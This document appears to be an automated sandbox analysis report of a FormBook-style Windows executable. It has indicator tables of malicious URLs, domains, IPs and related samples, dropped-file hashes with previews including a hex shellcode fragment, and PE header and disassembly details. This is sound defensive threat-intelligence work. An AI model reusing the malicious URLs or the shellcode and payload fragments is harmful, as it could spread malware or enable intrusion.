	INQUIRY_ORDER_FOR_QOUTATION.exe	Get hash	malicious	FormBook	Browse	www.nilwin.com/w14m/?8p-=RgLdab5XhCCB3jqn7Vi2pEN/W7gOS3jB38n2DLHJPRnoewz6mrTwgyYesLGMKl7gVg4w&Vp=HDKPXvqxKjZ4yj8p
	U8WCyVn8Mu.exe	Get hash	malicious	FormBook	Browse	www.pwpholdings.com/ro12/?9rNdFv=uAil5XdE1e6zA0aLCXQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/JS7rQnY8pJO546fRA==&xD=Ft5PKLC0brN4jHfp
	33040117281.exe	Get hash	malicious	CryptoWall	Browse	glamkey.com/errors/default/css/ap2.php?s=q7rg3eznvthp91
	Purchase order 88120-2023.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.flooringadvantage.com/en31/?4hTP3fG8=KUcC8fkldMT44CO7aVlxeHdIUYxETjS68jWSDAW8ZCT5/BvtgWeipdfa94FJxnSvzH9n&5jLT=2d6pK
	awu6e4e6x7.exe	Get hash	malicious	Unknown	Browse	mountainpower.net/index.php
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	www.pdqhomes.com/
	file.exe	Get hash	malicious	Pushdo, DanaBot, SmokeLoader	Browse	www.cokocoko.com/
192.0.78.25	tmgF4oswp3fH2HU.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tractionendurancecoaching.com/be03/?GjC4qd=eDAyqiSq8fufHkd2B9UcHwiZlH8Gvyu/8mkN8oYTV0oPmGWxIZPRnVvj16xFD+GZPzbI&mHNh=Sr6XdfC8ZP9h0pA
	JJUmnnkIxSCyKik.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.tractionendurancecoaching.com/be03/?rTBtDp=eDAyqiTe8/rvaUACdNUcHwiZlH8Gvyu/8mkN8oYTV0oPmGWxIZPRnVvj16xgYP2ZPzHF&N2MtQP=A0D4vjHhyTdpNr2p
	Z3MLFicTw5.exe	Get hash	malicious	FormBook	Browse	www.gildedbeautyaesthitics.com/ns03/?-Z1dif=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne89UWOV+E0hjfeI/1Cw==&Nt1HZJ=8papbVC054FDaj
	duGqHKp0OUXaX1D.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.gildedbeautyaesthitics.com/ns03/?Mli=Ejx28V0Mi/PKMFo4nxco0l6yr5i8wbzIhiv3vkPYYPmQLPpGZe2iDqne8+4JWli/3WeD&9rQhA=J48H
	International Bank Transfer.exe	Get hash	malicious	FormBook	Browse	www.voyagedebetterave.com/ve92/?KVvTZtEp=SKXwm0mP5osv+tB3n7pxaJIuZ2gns/beRRSaI9loB4VQNRcKjWpGz3LlPIL/LOa7b1KdZakZ+A==&ixo=GL0X
	NfNXiX42uQ.exe	Get hash	malicious	FormBook	Browse	www.burduremlakilan.com/jk56/?ndfxyf=R2Jd4&Jd7H=vUHa4t/MdhdOwuVCvD8uyvIDFi6LExMKoOKM/kOuD2lIQwvS7J46LAC2Okr9THJErjNM
	Factura_de_proforma_pdf.exe	Get hash	malicious	FormBook	Browse	www.slimshotonline.com/ey16/?xnMtsxw8=A/o10+Me4fvA+hta8k/hrhXphMSeIGQKvha56Qk62/qkqyp619OkBa+Em/4N0fL2+Mt4Err+Lw==&1bkpfB=R2MxBTeXnBq
	jYRjr28sHR.exe	Get hash	malicious	FormBook	Browse	www.lajtuf.com/bp31/
	PGiUp8uqGt.exe	Get hash	malicious	FormBook	Browse	www.illuminati4me.com/btrd/?2dz=odelT&-Z1dnr=Q3kWi+8g+tbDAN4znzTYQaSHZDljXDmr3SwP0PohYWX18fCHdmrKk2iHJyaTwrNQ+JWy
	JLavGK0bZb.exe	Get hash	malicious	FormBook	Browse	www.lithuaniandreamtime.com/4hc5/?VJEp=utxH9pwhq8XTGdt&FR3pw2=cbyLg/+yG8SQmnyN+ojfiN3a+JzSxQPEYaknOMddy8kPHpC/VJwUPcNk7jURfSy4thzO4h4zNA==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	3.94.41.167
	cbIcBAgY5W.exe	Get hash	malicious	SystemBC	Browse	52.86.6.113
	file.exe	Get hash	malicious	SystemBC	Browse	52.86.6.113
	file.exe	Get hash	malicious	CMSBrute	Browse	52.86.6.113
	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	3.94.41.167
	uTorrent.exe	Get hash	malicious	Unknown	Browse	52.86.6.113
	BWV4hz5GdR.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	3.94.41.167
	ACTCsxhga8.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	3.94.41.167
	qrtzqUHSqT.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	52.86.6.113
	executable.2772.exe	Get hash	malicious	Unknown	Browse	52.86.6.113
shops.myshopify.com	Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Document TOP19928.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	23.227.38.74
	Order-1351125X.docx.doc	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://outselluar.live	Get hash	malicious	Unknown	Browse	23.227.38.74
	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	98790ytt.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	PAGO BANORTE 6142024pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	60a8.scr.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	HSBC Payment Advice.img.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
ext-sq.squarespace.com	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	Att0027592.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	MT103-746394.doc	Get hash	malicious	FormBook	Browse	198.185.159.144
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf	Get hash	malicious	FormBook	Browse	198.185.159.145
	AWB_NO_907853880911.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	IZPnmcCu5EZWa98.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	unexpressiveness.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.185.159.144
	iY.exe	Get hash	malicious	FormBook	Browse	198.185.159.144

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	Payment_AdviceHyperoptic.html	Get hash	malicious	HTMLPhisher	Browse	54.174.166.97
	http://links.notification.intuit.com/ls/click?upn=u001.4HBRtPy8j6uXsK2aeX2RzAh5EFPhCIIFV3VEN-2Fx7CtL7yL0rqbEG5To4Yn7gWqQ9aLy0xQjXtfA1aWI51jOBcgZZmdPU7rNXiI9qBQrw0Fh0XMUzwxEuUgv3ZFNQWIem-2BNTPYnrL9k9a1nDRjz4a88WPYyDduqTuKohuiQXsusYwJ-2FidZWWf8oC-2Bke5XZf6maHD-2Fd7ablYFhYAopCg9-2FJ24-2F8yZwA220wlNNRUX0yppVttR34V4P26behAEAgmPnWgi1QdqkcH8GVovfzu4LIw-3D-3DQBy7_5Y9C-2B-2Fzbmi1Z8AZ1P0Xb45Ep-2FzkkH96c1HQoTeKyfF3Cy9GA0JrKF-2FtBKU7Gy7tV6PIIEw2aSpbKuiOE5zUrdfKHijLS1CrX6di2rdCWz3230MnOWYRyIFetWhrSPF9k5LzSphdJmNETjrHElDpdShj1s4ILnQWpWcU1acTiMnif850-2BYV-2F5lXeG2jTC-2BOwApN8qupRmwT8fNNE9PPcwErJLxahBxSpmSq91gTlumLJlQuv6Mi-2FueOgXZeZsKYVaksXeYc4hm3iYcmZyYCYz0c5CytX-2FkcYDgjcEPGcMdE4wdmef7F34ZhNuR1BzXUZca-2BlM-2FSHy6Wcv-2B44fNGLavW0-2FgwmkSe7DWrN2Qxs4-2BbmqEK8zVd2B-2F-2BfhLv7s-2BwUYCFzSfpco2w0S0EkPk2QiaigfgYJrhsDWFQrr8XAjN8LEK9fzOOYMlKBdNBCCovn1-2BQdoVowInLACYcfv7UF18ixzp9yjXcoI2GtVtXTFy0zwL-2BunyW6y6aLD3UTkKp7eGuS-2Fs2l9K233QQTHOgsxIsW5yOnAipuno6Jz4FUupJjvG-2FSd7m5GLY99tPmOlknWYVUdaS4l4nbH7zNFdVoP-2Fmr7J9FoB812uhszre4JhgikLbqFLMCT1av4GEdnKOwpstUkw9rVNgxd2MHPktA30uhIQeOnTGGKgw66UsPvJvw-3D	Get hash	malicious	Unknown	Browse	35.170.112.220
	http://62.133.61.26/Downloads/MOD_200.pdf.lnk	Get hash	malicious	Unknown	Browse	54.144.73.197
	205.185.121.21-mips-2024-07-01T10_13_50.elf	Get hash	malicious	Mirai, Moobot	Browse	34.206.144.46
	Doc3.docx	Get hash	malicious	Unknown	Browse	52.6.96.124
	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	3.226.182.14
	call_Playback_moog.com.html	Get hash	malicious	HTMLPhisher	Browse	100.29.154.22
	BNd5XPrLzR.elf	Get hash	malicious	Mirai, Moobot	Browse	34.235.30.75
	GIW8jzBGQQ.elf	Get hash	malicious	Mirai, Moobot	Browse	54.211.208.181
	g75NqH852l.elf	Get hash	malicious	Mirai, Moobot	Browse	52.6.223.247
AUTOMATTICUS	Aud_Msg_Scs_V.M1f536dcd0e8af1baf5dc97ff0a839f87a34b25b7.html	Get hash	malicious	Unknown	Browse	192.0.78.26
	http://blogairmasonwp.wpuserpowered.com	Get hash	malicious	Unknown	Browse	192.0.73.2
	Remittance advice 26b44723892edfbd6baf.eml	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	Quarantined Messages.zip	Get hash	malicious	HTMLPhisher	Browse	192.0.78.27
	http://www.qxlogistix.com	Get hash	malicious	Unknown	Browse	192.0.76.3
	Aud_Msg_Levelfourfinancial_V.M3446b5121533ecceed92c4b053acd666af0c48da.html	Get hash	malicious	HTMLPhisher	Browse	192.0.78.27
	Aud_Msg_Enablecomp_V.Ma6932c7c07d4e69c2bff4afd373e8086e46e204b.html	Get hash	malicious	HTMLPhisher	Browse	192.0.78.26
	http://playsportzone.com	Get hash	malicious	Unknown	Browse	192.0.77.2
	https://hotel-347695.eu/confirm/login/LORdtLVv	Get hash	malicious	Unknown	Browse	192.0.78.26
	https://www.winhelponline.com/blog/microsoft-edge-url-shortcut/	Get hash	malicious	HTMLPhisher	Browse	192.0.76.3
SQUARESPACEUS	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	Att0027592.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	kpCSGLBxAw2RnrW.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	DHL_AWB#6078538091.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	yq5xNPpWCT.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	198.185.159.145
	SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtf	Get hash	malicious	FormBook	Browse	198.185.159.145
	AWB_NO_907853880911.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	IZPnmcCu5EZWa98.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
	unexpressiveness.exe	Get hash	malicious	FormBook, GuLoader	Browse	198.185.159.144
	iY.exe	Get hash	malicious	FormBook	Browse	198.185.159.144
AMAZON-02US	INVOICE - MV CNC BANGKOK - ST24PJ-278.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	Materials specification with quantities.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
	PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exe	Get hash	malicious	FormBook	Browse	44.227.76.166
	Payment_AdviceHyperoptic.html	Get hash	malicious	HTMLPhisher	Browse	13.32.99.118
	https://na4.docusign.net/Signing/EmailStart.aspx?a=95fa3666-e4d2-4181-926f-7d752b5d1bb7&acct=4b225f64-a250-4de3-9bb5-6320c76f2c33&er=388f7591-fe27-446f-8df0-11aebdd778b2	Get hash	malicious	Unknown	Browse	35.162.207.33
	http://zoom.voipmessage.uk/XTVNEL3Y5b1J3cmNET2VKbmR6bVRsN3V1NmVOY1NGblBJVC9iTE8rdVgxbTVqY2FOZnZ4TUM0ZlFjRHpCR3RWejFXajBVK2d4TW1YbEM3bTdUSWMzV3hrSEFpYnNQL282UDBDM1E0OVhPS1ZjR1JpSzJpRlZZSGVWc3RkVld1K0ZNM2t1YU5qN0hocjRoMWlOeXBkYzlZUXdMYysyWTZaUWtNVVlSWWVCNG1FTnBPWXc3R2RFWjJSbVNEcEw3clVRbTRHVzNRPT0tLUR6bnh4akFBbEUrU3NKL3YtLXRQbTlZaDQ1Tzd4b0NQSFdzTDA4eWc9PQ==	Get hash	malicious	Unknown	Browse	34.248.74.196
	Agreement for Bmangan 5753.pdf	Get hash	malicious	HTMLPhisher	Browse	13.32.99.103
	YBzCUPEvkm.exe	Get hash	malicious	Unknown	Browse	52.78.112.22
	YBzCUPEvkm.exe	Get hash	malicious	Unknown	Browse	52.78.112.22
	http://links.notification.intuit.com/ls/click?upn=u001.4HBRtPy8j6uXsK2aeX2RzAh5EFPhCIIFV3VEN-2Fx7CtL7yL0rqbEG5To4Yn7gWqQ9aLy0xQjXtfA1aWI51jOBcgZZmdPU7rNXiI9qBQrw0Fh0XMUzwxEuUgv3ZFNQWIem-2BNTPYnrL9k9a1nDRjz4a88WPYyDduqTuKohuiQXsusYwJ-2FidZWWf8oC-2Bke5XZf6maHD-2Fd7ablYFhYAopCg9-2FJ24-2F8yZwA220wlNNRUX0yppVttR34V4P26behAEAgmPnWgi1QdqkcH8GVovfzu4LIw-3D-3DQBy7_5Y9C-2B-2Fzbmi1Z8AZ1P0Xb45Ep-2FzkkH96c1HQoTeKyfF3Cy9GA0JrKF-2FtBKU7Gy7tV6PIIEw2aSpbKuiOE5zUrdfKHijLS1CrX6di2rdCWz3230MnOWYRyIFetWhrSPF9k5LzSphdJmNETjrHElDpdShj1s4ILnQWpWcU1acTiMnif850-2BYV-2F5lXeG2jTC-2BOwApN8qupRmwT8fNNE9PPcwErJLxahBxSpmSq91gTlumLJlQuv6Mi-2FueOgXZeZsKYVaksXeYc4hm3iYcmZyYCYz0c5CytX-2FkcYDgjcEPGcMdE4wdmef7F34ZhNuR1BzXUZca-2BlM-2FSHy6Wcv-2B44fNGLavW0-2FgwmkSe7DWrN2Qxs4-2BbmqEK8zVd2B-2F-2BfhLv7s-2BwUYCFzSfpco2w0S0EkPk2QiaigfgYJrhsDWFQrr8XAjN8LEK9fzOOYMlKBdNBCCovn1-2BQdoVowInLACYcfv7UF18ixzp9yjXcoI2GtVtXTFy0zwL-2BunyW6y6aLD3UTkKp7eGuS-2Fs2l9K233QQTHOgsxIsW5yOnAipuno6Jz4FUupJjvG-2FSd7m5GLY99tPmOlknWYVUdaS4l4nbH7zNFdVoP-2Fmr7J9FoB812uhszre4JhgikLbqFLMCT1av4GEdnKOwpstUkw9rVNgxd2MHPktA30uhIQeOnTGGKgw66UsPvJvw-3D	Get hash	malicious	Unknown	Browse	54.231.169.168
TEAMINTERNET-ASDE	DHL AWB DOCUMENT.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.93
	yq5xNPpWCT.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	185.53.177.112
	Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe	Get hash	malicious	FormBook	Browse	185.53.179.92
	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	Mbabane.exe	Get hash	malicious	FormBook	Browse	185.53.178.13
	http://protect.dscsec.com/software.htm	Get hash	malicious	HTMLPhisher	Browse	185.53.179.29
	TT-SWIFT-Schindler.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe	Get hash	malicious	SystemBC	Browse	185.53.177.20
	t5SYVk0Tkt.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	185.53.177.31

Process:	C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe
File Type:	ASCII text, with very long lines (28756), with no line terminators
Category:	modified
Size (bytes):	28756
Entropy (8bit):	3.5858191560325166
Encrypted:	false
SSDEEP:	768:miTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbX+IZ6Gg4vfF3if6gyHV:miTZ+2QoioGRk6ZklputwjpjBkCiw2RH
MD5:	81BF57A1F736882763E7CB9AB52C93DD
SHA1:	6A499908C6F6476C8630CBBF9E96E668F9AAE58F
SHA-256:	FFE64820D18F1947401C04347DC54960D77E2B69329D44AA2D059835E6C029E9
SHA-512:	2CECA33AF0797FBC015C73A517518E904C5A261B638DE65AFDB852DBF23E7966732022E4D29F24114B2EE3FF505333C131F5E099D0288EE2DA6943580CFCAB23
Malicious:	false
Reputation:	low
Preview:	8D6804F867D7E3ED21599F86932DA5673082A29A59B06B261C54E6F1DF089BBB368C973697738FDC880x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

C:\Users\user\AppData\Local\Temp\autBE59.tmp

Download File

Process:	C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe
File Type:	data
Category:	dropped
Size (bytes):	180122
Entropy (8bit):	7.982305935823246
Encrypted:	false
SSDEEP:	3072:k5e8p2I3nQlVBt7rb+bZCApdsHv+C2qJK8qZt9x9uhueR93w1O33GCKq4C+:k5em/niVvrb+bYJDQ3PeUefw1i38C+
MD5:	722AA846E3E8D1F83F0906B4CD806CE4
SHA1:	8796CCAB0C671CE93C73F883444FD63FEE7848CF
SHA-256:	D0BF6F309A42009F162054CC091AA6993479CEDE3D89E02F403E7AEF9DB85110
SHA-512:	70A081B8424B5036F9AD5E5631146F2CB0A39834834545FB536DDF6E1F7C26BFA6E894E24E583053B3946CA238EA52C9DAF5CE205B84A82BC6B126B5C4F3288B
Malicious:	false
Reputation:	low
Preview:	EA06.....X.t.6.G7[._+.....y.O....i<m....4.'5...sP..... ..^..?).j/..r.8.FsJ.P...4.H....w.M.d..P.F`W.$Z.+..-..j:.........$...i..q$..mC...r.....C...&....Y..vk.....8.v........Pn.....<.G......f..,.B...-....'5.H.i.......4Uf....iP.u`..l@.. ..+t(..9.L..`....i.....#......y...$..6~p....4`.ti.....Q'3....T.7...................p.........n.}.Ja...f.....?..7W<.b....6X.l+...`.......U..Vm.Sf.kM/.Vq.o\|J....3:..a..i.X..be..xl..O1..L.[8..C...'..X.....1.}.sc..r....'.v..N.n...Lp......)8....L.m.:.$.1...6.m.2.9.e.Y\|...S.=.5W...3}7.G...`.g....O9...v...y9..be..Q..n..M..j..<...[+.=.._9..[.=..M....o.....g.,G..S.kg}.uce..M........&...o..lc.~.'...aTm. ...`#T_..J....i....'>...A#.~...W.#.n......I.Dg...;q...).~.j...N....#...VM.....~..~.W........#2...=.%7eQ.E....x..a.X...f.....S}r.v......T.......u:.....h!.....c.OzP......k.x%#....6.^L.q...7\|n..c...5.O'[..i....Ou........y..h4<\|..K..Dv[^LRS....[/f35.j........8y.B......y.r......".1..*px-#u..r.....w....

C:\Users\user\AppData\Local\Temp\autBE98.tmp

Download File

Process:	C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe
File Type:	data
Category:	dropped
Size (bytes):	9810
Entropy (8bit):	7.602225440726837
Encrypted:	false
SSDEEP:	192:65jwEiq+uHKrLM0IltC6jQqSa6fYHToxycO+m3wYDklARuQZMZa:I6q+Brw/gjYKycHmNsAR+Za
MD5:	E0BC3F5B60594F016620C0ACE95C367F
SHA1:	0D4ECC4CA3699F1172FF2B94EC58B039344F4D43
SHA-256:	7D2CD47E3604F82288A93535B438C5BA38F5B37E31D3C9F986F388134D4B10AE
SHA-512:	FB3D298B7044CAA42AFC4D9DAD0F726BCF739C266FB45DE05D8829740650246CE8B92B3F19CF8F489E11BB4215AAB947C1D58FC586DEB6993E2E8384B9B045BF
Malicious:	false
Reputation:	low
Preview:	EA06..pT.Q&...8.M.z,.D.Lf....y9......o3.N&T...5...j..m1..f.Y..cD.L'.....3.N(s...m9...s.5..8.L/.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,@. ...3+..d....s4.l&..........\|....sa...`.........Y&.K0.....-vs5.M..2...N&.I...@.>..........$.0...fx. ..$l...I...#..$6...... ..... .Z...a.5..&.).....L.j.;$....M.j.;$....X@j.;%....Y@j.;,.....j.e.\|f #^...j......l.....l.5....>0..Xf....M.^....$zn.....G..I....C...M.\|........}S{....7...\| l..P..........0...`>;..c7.6..{......=..7..............6,......b...,S ...i5.M.4.b..i\|v)....b.h.,@..%........9....c...\|3Y..h......._......@.>K...,v[..q5.M,.@..i7.X......9....2.......,.`....3.,.i8........}.k(.f..@..M&V....7.,.x....&.......0.......Fh...Fb.....3.."a9...`....,vb.....cd.X..P.Fl.Y.$..c. ....I...d..f.!...,vd......8..P.......0.....2...y...D.......c.0.......b.<NA...NM..;4.X.q1..&@Q..B.Y.ah......Yl.i..."..Bvj.........ic..'3Y..'f.....,j.1........C.`....7b.., .p..T.......Y,Vi......@

C:\Users\user\AppData\Local\Temp\miaoued

Download File

Process:	C:\Users\user\Desktop\2024 Lusail Fence-WITH STICKER-2-003.exe
File Type:	data
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.834985627824351
Encrypted:	false
SSDEEP:	3072:fgI4JKUp4VyrJOpw0NnOJE/6ugiac49jK7zndW/oziv/KH2zhJqTqJ74ja:fuJKYLB0JH6ugiIpKHdW/oYFh8TqD
MD5:	C66B2FBD6C6E481C99D39012B54602B8
SHA1:	A8527BECF8B3F77B1AA0265CAF97C735D3C42EE4
SHA-256:	32D6A0E4B5E58589FA47F953B16A1DC3FFE0449FBD91B1D16FB3D654BC034595
SHA-512:	BD9F15059A857F6472CAEA046BCE567103C39EE965026919558ED23BFB8C4347EDE41317F6821EBCC85E5710C3DC856CE346E90C473FB3CAFEDA1E8A316208D7
Malicious:	false
Reputation:	low
Preview:	.c.k.3W6R...K....z.W5...qAI..F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6.D9YL^.^9.:...Eu.c.Q9JfC%Y56X4b"X>W)GwT7dK,,aP>..\|..?+]<lL4Z.F3W6RD9.I.. ...4...$..P....P.9....6..3...._..(Z8..U.6RD9YBA9P9F3W6RDi.BAuQ8Fa<..D9YBA9P9.3U7YE3YB.;P9F3W6RD9.@9P)F3W.PD9Y.A9@9F3U6RA9XBA9P9C3V6RD9YB.;P9D3W6RD9[B..P9V3W&RD9YRA9@9F3W6RT9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9w6$A$9F3..PD9IBA9.;F3G6RD9YBA9P9F3W6rD99BA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9YBA9P9F3W6RD9Y

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.068227553174271
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2024 Lusail Fence-WITH STICKER-2-003.exe
File size:	1'128'960 bytes
MD5:	e03cefcd99feaf7ca8fd37a4bec8280c
SHA1:	1ef21abddff685aeb42767f9288d67bf22a9422d
SHA256:	f86b5c769c4ae7db9a13fa32b90030bf8b700d8d0f5c30584044942602d2af30
SHA512:	af81a05f31cc3cd87872f95d448ce65936c6cd9ee8296c2ee46fd9af7b1cc7f76104c4272c4ce03d206086cb676e034e8a40670ec98494de8c28e551f2776277
SSDEEP:	24576:2AHnh+eWsN3skA4RV1Hom2KXMmHaFUjMJc+pSA1TZHrhb5:Rh+ZkldoPK8YaFXJnrT
TLSH:	B435BD0273D5C036FFAB92739B6AF20556BD79254133852F13982DB9BC701B2227E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6681E421 [Sun Jun 30 23:02:57 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE2C8B26E2Dh
jmp 00007FE2C8B19BE4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE2C8B19D6Ah
cmp edi, eax
jc 00007FE2C8B1A0CEh
bt dword ptr [004C41FCh], 01h
jnc 00007FE2C8B19D69h
rep movsb
jmp 00007FE2C8B1A07Ch
cmp ecx, 00000080h
jc 00007FE2C8B19F34h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE2C8B19D70h
bt dword ptr [004BF324h], 01h
jc 00007FE2C8B1A240h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FE2C8B19F0Dh
test edi, 00000003h
jne 00007FE2C8B19F1Eh
test esi, 00000003h
jne 00007FE2C8B19EFDh
bt edi, 02h
jnc 00007FE2C8B19D6Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE2C8B19D73h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE2C8B19DC5h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x493c0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
